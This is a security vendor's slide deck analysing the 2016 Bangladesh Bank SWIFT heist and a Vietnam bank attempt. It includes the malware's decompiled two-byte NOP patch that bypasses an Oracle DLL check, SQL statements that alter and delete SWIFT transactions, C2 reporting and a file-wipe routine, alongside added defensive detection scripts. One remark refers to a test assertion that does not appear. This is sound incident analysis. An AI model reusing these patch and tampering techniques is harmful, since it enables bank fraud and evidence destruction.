
CyberHeist 2016

Shafique Dawood, Regional Director APAC


BAE Systems

1 | Copyright 2016 BAE Systems. All Rights Reserved.


Feb. 2016: Bangladesh Bank Heist
Hollywood (2001): $150M
Cyber space (2016): $951M


Schematics of Cyber Heist
˃ Normal Bank Operation
[diagram; nodes: Client, Ordering Account, Foreign Bank, Corr. Account, US BANK, Corr. Account, Beneficiary's Bank, Beneficiary]


Schematics of Cyber Heist
˃ Compromised Bank Operation
[diagram; nodes: Client, Ordering Account, Foreign Bank, Corr. Account, US BANK, Corr. Account, Compromised Bank, Beneficiary]


Schematics of Cyber Heist
˃ Compromised Bank Operation
[diagram; nodes: Client, Ordering Account, Offshore Bank, Corr. Account, US BANK, Corr. Account, Compromised Bank, Beneficiary]




Schematics of Cyber Heist
˃ Purpose of the Malware: Concealing the traces



Bangladesh Bank Heist
May 2015: Four accounts set up at Rizal Commercial Banking Corp. (RCBC) in the Philippines
24 Jan 2016 (Sun) - 29 Jan 2016 (Fri): A 'suspicious login' was made & Sysmon run on 'SWIFTLIVE'
4 Feb 2016 (Thu): Attackers execute SWIFT transfer to accounts in Sri Lanka and Philippines
5 Feb 2016 (Fri): BB notices SWIFT error: 'A file is missing or changed'
6 Feb 2016 (Sat): BB regains access; finds messages from US Fed Reserve querying transactions
8 Feb 2016 (Mon, Chinese New Year): BB issues stop orders to US Fed, RCBC, and other banks in US and Sri Lanka
29 Feb 2016 (Mon): Philippine authorities freeze accounts at RCBC, as well as accounts at casinos and of companies used


Bangladesh Bank Heist
˃ Cyber-attack details
[diagram: SWIFT Alliance Software server; CONFIG FILE gpca.dat]
1. Attackers gain access and install malware
2. Malware decrypts config file containing search terms to scan within SWIFT messages
3. Malware identifies and exploits host's SWIFT application to bypass validity check within Oracle DLL
4. SWIFT financial application (FIN) messages are now monitored and intercepted by the malware. Functionality continues in loop until 06:00 6th Feb 2016
5. SWIFT messages are sent to attacker printers and are printed in real time
6. PRC and FAL files are scanned for attacker defined terms. On match will extract transfer reference and sender address to form a SQL DELETE statement to delete a transaction
7. Messages that contain attacker defined terms will be used to form SQL statements to query Convertible Currency availability and then update transfer amounts
8. Checks the 'Login/Logout' status of the Journal table every hour and sends result to attacker domain over HTTP


Bangladesh Bank Heist
˃ Patch
3. Malware checks to see if any processes have 'liboradb.dll' module loaded
4. If found, it overwrites 2 bytes at a specific offset with 'do nothing' (0x90 NOP) instructions
5. Overwritten bytes forces the host application to always pass the validity check
6. The malware is now able to execute database transactions

Decompiled patch routine (bPatch selects between applying and removing the patch; protection arguments are shown as they appear in the decompiler output on the slide):
    if (VirtualProtectEx(hProcess, lpAddr, 2, PAGE_EXECUTE_READWRITE, (PDWORD)&hProcess)
        && ReadProcessMemory(hProcess, lpAddr, &buffer, 2, &dwRead))
    {
        if (bPatch)
        {
            /* apply: replace the jnz with two nops */
            if ((WORD)buffer == JNZ)
                res = WriteProcessMemory(hProcess, lpAddr, &NOPs, 2, &dwWritten);
        }
        else
        {
            /* remove: put the jnz back */
            if ((WORD)buffer == NOPs)
                res = WriteProcessMemory(hProcess, lpAddr, &JNZ, 2, &dwWritten);
        }
        if (res)
            VirtualProtectEx(hProcess, lpAddr, 2, hProcess, &flOldProtect);
    }

Byte constants referenced by the routine:
    .data:0040F170 NOPs db 90h
    .data:0040F171      db 90h
    .data:0040F174 JNZ  db 75h
    .data:0040F175      db 4


Bangladesh Bank Heist
˃ Patch Result
Original Code:
    85 C0          test eax, eax   ; some important check
    75 04          jnz failed      ; if failed, jump to 'failed' label below
    33 C0          xor eax, eax    ; otherwise, set result to 0 (success)
    EB 17          jmp exit        ; and then exit
    failed:
    B8 01 00 00 00 mov eax, 1      ; set result to 1 (failure)

Patched Code:
    85 C0          test eax, eax   ; some important check
    90             nop             ; 'do nothing' in place of 0x75
    90             nop             ; 'do nothing' in place of 0x04
    33 C0          xor eax, eax    ; always set result to 0 (success)
    EB 17          jmp exit        ; and then exit
    failed:
    B8 01 00 00 00 mov eax, 1      ; never reached: set result to 1 (failure)


Bangladesh Bank Heist
˃ Patch
[flow chart: before the patch, 'Authenticated?' NO → Do Nothing, YES → Full Access → DataBase; after the patch the check is replaced by 'do nothing' (NOP) and execution always continues to Full Access → DataBase]


Bangladesh Bank Heist
˃ Replacing the 2 bytes affects 8 bits only
What's easier to flip?
This?   0111 0101 0000 0100 → 1001 0000 1001 0000 (the same two bytes in binary; 8 bits differ)
Or this?   75 04 → 90 90
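A defender's counterpart to the three patch slides above, as an added example (not part of the BAE deck and not the malware's code): it scans an image of the loaded module for the eight-byte check sequence from the 'Patch Result' slide, reports whether the jnz is intact or has been NOP'd, and computes the bit distance behind the 'affects 8 bits only' slide. The byte sequences come from the slides; the sample images, the file-path helper and the padding bytes are constructed placeholders. Because the malware patches process memory, the image to scan is a dump of the module from the running process, not the DLL on disk.

```python
"""Detect the two-byte jnz -> nop nop patch in a module image.

Added example for the slides above; not BAE Systems' code. The byte
sequences come from the 'Patch Result' slide; everything else is constructed.
"""
from pathlib import Path

# test eax,eax / jnz +4 / xor eax,eax / jmp exit   (original validity check)
ORIGINAL_CHECK = bytes.fromhex("85C0 7504 33C0 EB17")
# test eax,eax / nop / nop / xor eax,eax / jmp exit (patched validity check)
PATCHED_CHECK = bytes.fromhex("85C0 9090 33C0 EB17")
JNZ_BYTES = bytes.fromhex("7504")
NOP_BYTES = bytes.fromhex("9090")


def scan_for_patch(image: bytes) -> list[tuple[int, str]]:
    """Return (offset, state) for each occurrence of the validity check.

    state is 'intact' where 75 04 is still present and 'patched' where
    the two bytes have been replaced by 90 90.
    """
    findings = []
    width = len(ORIGINAL_CHECK)
    for off in range(len(image) - width + 1):
        window = image[off:off + width]
        if window == ORIGINAL_CHECK:
            findings.append((off, "intact"))
        elif window == PATCHED_CHECK:
            findings.append((off, "patched"))
    return findings


def scan_file(path: str) -> list[tuple[int, str]]:
    """Scan a module image dumped from process memory (path is a placeholder)."""
    return scan_for_patch(Path(path).read_bytes())


def bits_changed(before: bytes, after: bytes) -> int:
    """Hamming distance between two equal-length byte strings."""
    if len(before) != len(after):
        raise ValueError("byte strings must have equal length")
    return sum(bin(a ^ b).count("1") for a, b in zip(before, after))


# Constructed sample images: int3 padding around the check sequence at offset 16.
INTACT_IMAGE = b"\xcc" * 16 + ORIGINAL_CHECK + b"\xcc" * 8
PATCHED_IMAGE = b"\xcc" * 16 + PATCHED_CHECK + b"\xcc" * 8

if __name__ == "__main__":
    print(scan_for_patch(INTACT_IMAGE))        # [(16, 'intact')]
    print(scan_for_patch(PATCHED_IMAGE))       # [(16, 'patched')]
    print(bits_changed(JNZ_BYTES, NOP_BYTES))  # 8
```

An exact-sequence match is deliberately narrow: it catches the specific patch the slide describes and nothing else, so it belongs beside a general in-memory integrity check (comparing the mapped text section against the on-disk DLL) rather than replacing one.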


Bangladesh Bank Heist
˃ Monitored messages
Monitored paths:
[ROOT_DRIVE]:\Users\Administrator\AppData\Local\Allians\mcm\in\
[ROOT_DRIVE]:\Users\Administrator\AppData\Local\Allians\mcm\out\
[ROOT_DRIVE]:\Users\Administrator\AppData\Local\Allians\mcp\in\*.*
[ROOT_DRIVE]:\Users\Administrator\AppData\Local\Allians\mcp\out\*.*
[ROOT_DRIVE]:\Users\Administrator\AppData\Local\Allians\mcp\unk\*.*
[ROOT_DRIVE]:\Users\Administrator\AppData\Local\Allians\mcs\nfzp
[ROOT_DRIVE]:\Users\Administrator\AppData\Local\Allians\mcs\nfzf
[ROOT_DRIVE]:\Users\Administrator\AppData\Local\Allians\mcs\fofp
[ROOT_DRIVE]:\Users\Administrator\AppData\Local\Allians\mcs\foff

Looking for:
"19A: Amount"
"FEDERAL RESERVE BANK"
": Debit"
" 20: Transaction"
"Debit/Credit :"
"90B: Price"
"Sender :"
"FIN 900 Confirmation of Debit"
"Amount :"
"62F: "


Bangladesh Bank Heist
˃ SQL queries
Monitoring Login/Logout events in the journal:
SELECT * FROM (SELECT JRNL_DISPLAY_TEXT, JRNL_DATE_TIME FROM
SAAOWNER.JRNL_%s WHERE JRNL_DISPLAY_TEXT LIKE '%%LT
BBHOBDDHA: Log%%' ORDER BY JRNL_DATE_TIME DESC) A WHERE
ROWNUM = 1;
Result reported to the attacker domain as: GET: [C&C_server]/al?---O
'BBHOBDDH' is the SWIFT code for the Bangladesh Bank in Dhaka

Manipulating balances (The amount of Convertible Currency):
UPDATE SAAOWNER.MESG_%s SET MESG_FIN_CCY_AMOUNT = '%s' WHERE MESG_S_UMID = '%s';
UPDATE SAAOWNER.TEXT_%s SET TEXT_DATA_BLOCK = UTL_RAW.CAST_TO_VARCHAR2('%s')
WHERE TEXT_S_UMID = '%s';

Sending 'doctored' (manipulated) SWIFT confirmation messages for local printing:
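The statements on this slide are issued directly against the Alliance database rather than through the application, which makes a database audit trail the natural place to detect them. The following is an added example (not BAE Systems' code): one rule per statement shape from the slide, run over a constructed audit log in a made-up 'timestamp|os_user|program|sql' format. The table suffixes, UMIDs, amounts, timestamps and program names in the sample lines are all constructed, and the `%s` placeholders of the malware's format strings are filled in as a real session would see them.

```python
"""Flag the Alliance database statements listed above in an audit trail.

Added example, not BAE Systems' code. The statement shapes are taken from
the slide; the log format and every sample line below are constructed.
"""
import re

# One rule per statement shape the slide attributes to the malware.
RULES = [
    ("journal-login-poll",
     re.compile(r"SAAOWNER\.JRNL_\w+.*JRNL_DISPLAY_TEXT\s+LIKE.*ROWNUM\s*=\s*1",
                re.I | re.S)),
    ("amount-tamper",
     re.compile(r"\bUPDATE\s+SAAOWNER\.MESG_\w+\s+SET\s+MESG_FIN_CCY_AMOUNT\b", re.I)),
    ("text-block-tamper",
     re.compile(r"\bUPDATE\s+SAAOWNER\.TEXT_\w+\s+SET\s+TEXT_DATA_BLOCK\b", re.I)),
    ("message-delete",
     re.compile(r"\bDELETE\s+FROM\s+SAAOWNER\.\w+", re.I)),
]


def classify(sql: str) -> list[str]:
    """Names of every rule the statement matches (empty list for benign SQL)."""
    return [name for name, pattern in RULES if pattern.search(sql)]


def scan_log(text: str) -> list[tuple[int, str, list[str]]]:
    """Parse 'timestamp|os_user|program|sql' lines; return (line_no, program, rules) per hit."""
    hits = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        if not line.strip():
            continue
        _ts, _user, program, sql = line.split("|", 3)
        rules = classify(sql)
        if rules:
            hits.append((line_no, program, rules))
    return hits


# Constructed audit lines; UMIDs, amounts, dates and program names are made up.
SAMPLE_LOG = """\
2016-02-04T20:36:00Z|Administrator|sqlplus.exe|SELECT * FROM (SELECT JRNL_DISPLAY_TEXT, JRNL_DATE_TIME FROM SAAOWNER.JRNL_20160204 WHERE JRNL_DISPLAY_TEXT LIKE '%LT BBHOBDDHA: Log%' ORDER BY JRNL_DATE_TIME DESC) A WHERE ROWNUM = 1
2016-02-04T20:40:12Z|Administrator|sqlplus.exe|UPDATE SAAOWNER.MESG_20160204 SET MESG_FIN_CCY_AMOUNT = '20000000' WHERE MESG_S_UMID = 'UMID-EXAMPLE-1'
2016-02-04T20:40:13Z|Administrator|sqlplus.exe|UPDATE SAAOWNER.TEXT_20160204 SET TEXT_DATA_BLOCK = UTL_RAW.CAST_TO_VARCHAR2('3A32303A') WHERE TEXT_S_UMID = 'UMID-EXAMPLE-1'
2016-02-04T20:41:00Z|Administrator|sqlplus.exe|DELETE FROM SAAOWNER.MESG_20160204 WHERE MESG_S_UMID = 'UMID-EXAMPLE-2'
2016-02-04T20:42:00Z|swift|alliance_app|SELECT COUNT(*) FROM SAAOWNER.MESG_20160204
"""

if __name__ == "__main__":
    for line_no, program, rules in scan_log(SAMPLE_LOG):
        print(f"line {line_no}: {program}: {', '.join(rules)}")
```

The program column is kept in each hit on purpose: direct DML against SAAOWNER.MESG_* and TEXT_* from an interactive client is the stronger signal, and a hourly SELECT on the journal with ROWNUM = 1 from anything other than the application is the polling behaviour step 8 describes.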


Cyber Heist: Vietnam
˃ Log/PDF Cleaning Tool
[diagram, log cleaning: read original log file → read blocks one-by-one → ignore blocks with MESSAGE_FILENAME → temporary file → fill log with random data (e.g. DFB0 1CEA29 57B1FF 290DCA) → replace log data → restore original timestamp]
[diagram, PDF cleaning: trojan reads original PDF file → converts into XML → reads blocks one-by-one → ignores blocks with MESSAGE_FILENAME → temporary XML file → converts into PDF → modified PDF file passed to Foxit Reader → user opens the modified PDF file]


Cyber Heist: Vietnam
˃ Monitored messages
LOG_PATH\TPBVVNVX_TPBVVNVX_FileIn_DATE.txt
LOG_PATH\TPBVVNVX_TPBVVNVX_FilleOut_DATE.txt
LOG_PATH\TPBVVNVX_TPBVVNVX_PrintedIn_DATE.txt
LOG_PATH\TPBVVNVX_TPBVVNVX_PrintedOut_DATE.txt
LOG_PATH\TPBVVNVX_TPBVVNVX_PrnIn_DATE.txt
LOG_PATH\TPBVVNVX_TPBVVNVX_PrnOut_DATE.txt
TPBVVNVX: Tien Phong Commercial Joint Stock, Hanoi

Looking for:
': Statement Line'
'Closing Balance (Booked Funds)'
' Opening Balance'
'Sender'
': Debit'
': Credit'
': Closing Avail Bal (Avail Funds)'
'Instance Type and Transmission'
': FIN 950 '

Targeting transactions with SWIFT codes:
[table: SWIFT Code / Banking Institution; rows not legible in the extraction]


Cyber Heists: Vietnam first, then Bangladesh



Attribution
Wipe-out function:
Machine Opcode      Disassembled Code
B8 20 10 00 00      mov eax, 1020h
E8 96 EA 04 00      call __alloca_probe
53                  push ebx
55                  push ebp
57                  push edi
FF 15 4C F0 45 00   call ds:GetTickCount
...                 ...


Attribution
Wipeout function (msoutc.exe, 2014)   Wipe-out function (Vietnam malware, 2015)
B820100000E8B64E0000535557FF1500      B820100000E896EA0400535557FF154C
90400050FF154C90400083C404C64424      F0450050FF152CF1450083C404C64424
0CFFFF156890400025FF000080790748      0CFFFF1524F1450025FF000080790748
0D00FFFFFF408844240DB9FF03000033      0D00FFFFFF408844240DB9FF03000033
C08D7C242DC644242C5F33DBF3AB66AB      C08D7C242DC644242C5F33DBF3AB66AB
5368800000006A0353AA8B8424401000      5368800000006A0353AA8B8424401000
0053680000004050C644242AFF885C24      0053680000004050C644242AFF885C24
2BC644242C7EC644242DE7FF15A4AC40      2BC644242C7EC644242DE7FF1548F045
008BE883FDFF7510FF151C9040005F5D      008BE883FDFF7510FF1508F045005F5D
5B81C420100000C3566A02536AFF55FF      5B81C420100000C3566A02536AFF55FF
15D4AC40008D4C242453518D5424386A      1544F045008D4C242453518D5424386A
015255FF15ACAC400055FF15C8AC4000      015255FF1540F0450055FF153CF04500
1EFFFFFF55FF15A8AC40008B94243410      1EFFFFFF55FF1510F045008B94243410
00005352E847FDFFFF83C4085E5F5D5B      00005352E847FDFFFF83C4085E5F5D5B
The bytes highlighted on the slide as differing are the call operands only (for example B64E0000 vs 96EA0400 after E8, and 4C9040 vs 2CF145 after FF15); every other byte of the routine is identical.
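The comparison this slide makes by eye can be automated. The following is an added example (not BAE Systems' code) that takes the two hex dumps from the slide, counts the raw byte differences, then compares again after masking the 4-byte operands of `call rel32` (E8) and `call [abs32]` (FF 15), the bytes a different load address and import table change between two builds of the same source. The masking is a linear opcode scan rather than a real disassembly; that it suffices here is an assumption that holds for this straight-line routine but not for arbitrary code.

```python
"""Compare two builds of the wipe-out routine modulo relocated call targets.

Added example, not BAE Systems' code. The two hex dumps are the ones on the
slide (16 bytes per row); the masking heuristic is a constructed simplification.
"""

# msoutc.exe (2014), left column of the slide.
MSOUTC_2014 = bytes.fromhex("".join("""
B820100000E8B64E0000535557FF1500
90400050FF154C90400083C404C64424
0CFFFF156890400025FF000080790748
0D00FFFFFF408844240DB9FF03000033
C08D7C242DC644242C5F33DBF3AB66AB
5368800000006A0353AA8B8424401000
0053680000004050C644242AFF885C24
2BC644242C7EC644242DE7FF15A4AC40
008BE883FDFF7510FF151C9040005F5D
5B81C420100000C3566A02536AFF55FF
15D4AC40008D4C242453518D5424386A
015255FF15ACAC400055FF15C8AC4000
1EFFFFFF55FF15A8AC40008B94243410
00005352E847FDFFFF83C4085E5F5D5B
""".split()))

# Vietnam malware (2015), right column of the slide.
VIETNAM_2015 = bytes.fromhex("".join("""
B820100000E896EA0400535557FF154C
F0450050FF152CF1450083C404C64424
0CFFFF1524F1450025FF000080790748
0D00FFFFFF408844240DB9FF03000033
C08D7C242DC644242C5F33DBF3AB66AB
5368800000006A0353AA8B8424401000
0053680000004050C644242AFF885C24
2BC644242C7EC644242DE7FF1548F045
008BE883FDFF7510FF1508F045005F5D
5B81C420100000C3566A02536AFF55FF
1544F045008D4C242453518D5424386A
015255FF1540F0450055FF153CF04500
1EFFFFFF55FF1510F045008B94243410
00005352E847FDFFFF83C4085E5F5D5B
""".split()))

CALL_REL32 = 0xE8         # call rel32
CALL_ABS32 = b"\xff\x15"  # call dword ptr [abs32]


def mask_call_targets(code: bytes) -> bytes:
    """Zero the 4-byte operand after every E8 and FF 15 opcode.

    Linear scan, not a disassembler: adequate for this straight-line routine,
    where the only relocatable bytes are the call operands.
    """
    out = bytearray(code)
    i = 0
    while i < len(out):
        if out[i] == CALL_REL32 and i + 4 < len(out):
            out[i + 1:i + 5] = bytes(4)
            i += 5
        elif out[i:i + 2] == CALL_ABS32 and i + 5 < len(out):
            out[i + 2:i + 6] = bytes(4)
            i += 6
        else:
            i += 1
    return bytes(out)


def differing_offsets(a: bytes, b: bytes) -> list[int]:
    """Offsets where the raw bytes differ."""
    return [i for i, (x, y) in enumerate(zip(a, b)) if x != y]


def same_modulo_relocation(a: bytes, b: bytes) -> bool:
    """True when the code is identical once call targets are ignored."""
    return len(a) == len(b) and mask_call_targets(a) == mask_call_targets(b)


def absolute_call_targets(code: bytes) -> list[int]:
    """Import-table slots referenced by FF 15 calls, in order of appearance."""
    targets = []
    i = 0
    while i < len(code):
        if code[i] == CALL_REL32 and i + 4 < len(code):
            i += 5
        elif code[i:i + 2] == CALL_ABS32 and i + 5 < len(code):
            targets.append(int.from_bytes(code[i + 2:i + 6], "little"))
            i += 6
        else:
            i += 1
    return targets


if __name__ == "__main__":
    raw = differing_offsets(MSOUTC_2014, VIETNAM_2015)
    print(f"{len(raw)} of {len(MSOUTC_2014)} bytes differ")        # 30 of 224 bytes differ
    print(same_modulo_relocation(MSOUTC_2014, VIETNAM_2015))        # True
    print(hex(absolute_call_targets(VIETNAM_2015)[0]))               # 0x45f04c
```

The first FF 15 target recovered from the 2015 sample is 0x45F04C, the `call ds:GetTickCount` shown on the previous slide; the same slot in the 2014 sample is 0x409000. Thirty of the 224 bytes differ raw, zero once the nine import calls and two rel32 calls are masked, which is the identical-source conclusion the slide draws. The last assertion in the test flips one opcode byte to show that the masked comparison still rejects genuinely different code.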
Attribution
Wipe-out function:
    /* overwrite the file name in place with random lower-case letters */
    if (*fileName)
    {
        do
        {
            *fileName = rand() % 26 + 'a';
            next_char = (fileName++)[1];
        }
        while ( next_char );
    }
    /* rename the target to the randomised name, then remove it */
    if (MoveFileA(lpExistingFileName, &_filepath))
        _filePath = &_filepath;
    if (bDir)
    {
        if (!RemoveDirectoryA(_filePath))
            return GetLastError();
    }
    else if (!DeleteFileA(_filePath))
    {
        return GetLastError();
    }
Attribution
[timeline figure, Dec 2015 to Apr 2016: Vietnam Tien Phong Bank heist attempt (Dec 2015) with compiled and discovered dates for Foxit Reader.exe, mspdclr.exe and nroff_b.exe; Bangladesh Bank heist (4-Feb-2016/5-Feb-2016) with compiled and discovered dates for evtsys.exe and evtdiag.exe; dates marked: 4-Dec-2015, 8-Dec-2015, 16-Dec-2015, 22-Dec-2015, 4-Feb-2016/5-Feb-2016, 28-Feb-2016, 25-Mar-2016]

Strings compared across samples:
Trojanised Foxit Reader/SWIFT Message Cleaner (Vietnam): FwtSqmSession106829323_S-1-5-19 ; y0uar3@s!llyid!07,ou74n60u7f001
Main Malware used in Bangladesh Heist (US Cert Alert): FwtSqmSession106829323_S-1-5-19 ; y@s!11yid60u7f!07ou74n001
msoutc.exe (PwC): FwtSqmSession106839323_S-1-5-20 ; y@s!11yid60u7f!07ou74n001


Thank You.
